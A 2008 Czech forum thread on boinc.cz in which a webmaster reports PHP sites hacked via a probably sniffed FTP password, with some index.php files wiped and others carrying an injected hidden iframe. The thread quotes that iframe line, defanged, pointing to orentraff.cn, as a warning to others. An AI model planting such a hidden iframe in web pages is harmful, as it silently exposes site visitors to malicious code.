Forum boinc.cz

Fórum o projektech pod systémem BOINC (distribuované výpočty)
https://www.boinc.cz/forum/

ORENTRAFF.cn

https://www.boinc.cz/forum/viewtopic.php?t=2107

Stránka 1 z 1

ORENTRAFF.cn

Napsal: úte úno 05, 2008 1:32 pm
od Duha
Zdravím,
komu nějaká havěť taky napadla PHP stránky?
Likviduje to INDEX.PHP, na několika se mi ale stalo že to "jen" přidalo

<iframe src="hxxp://orentraff.cn/in.cgi?3" width="0" height="0" style="display:none"></iframe>

(teda místo hxxp klasika)

Přes WHOIS to vyhází podivné údaje...
S podivem je, že máme stránky na Active24 (Linux)...
Tak bacha na to a kontrolujte stránky!

Mějte se,
Duha

Napsal: úte úno 05, 2008 1:57 pm
od dejvidek
Je něco divného na active24? :D Nějak je ta havěť na ně zaměřená? :-)
dejv

Napsal: úte úno 05, 2008 2:28 pm
od Duha
Nevím nevím, googlil jsem a na pár zpráv ohledně nefunkčnosti stránek v souvislosti s Orentraff.cn jsem našel... smaže to obsah INDEX.PHP a leze to napříč netem :?

Napsal: úte úno 05, 2008 5:19 pm
od Honza
Duha píše:smaže to obsah INDEX.PHP a leze to napøíè netem :?
Jak smaže? To snad není taková p.del - nebo nìjaký security trouble apache? Hodily by se probrobnosti toho, co a za jakých okolností to mùže napadnout.

Napsal: úte úno 05, 2008 5:51 pm
od Duha
Honza píše:Jak smaže? To snad není taková p.del
To mě právě dostalo, nejdřív jsem myslel že jim třeba spadnul server a nepovedla se obnova filesystému, ale pak v dalších index.php jsem zjistil že to třeba na konec souboru přidalo to <iframe>, další měl zas velikost 0 byte...
Každopádně je to hustý :shock:

Napsal: stř úno 06, 2008 3:38 pm
od Duha
Zdravím,
tak mi bylo podporou hostingu sděleno že ty změny přišly z IP ze Singapuru, zřejmě odposlechnutý heslo k FTP a robot zařídil zbytek :?
Jen mě mate že to bylo na hromadě stránek i ve světě...
(ode dneška už k FTP přistupuju přes SSL) :)

Mějte se, a hlavně keep crunching :D
Všechny časy jsou v UTC+02:00
Stránka 1 z 1

Založeno na phpBB® Forum Software © phpBB Limited

Český překlad – phpBB.cz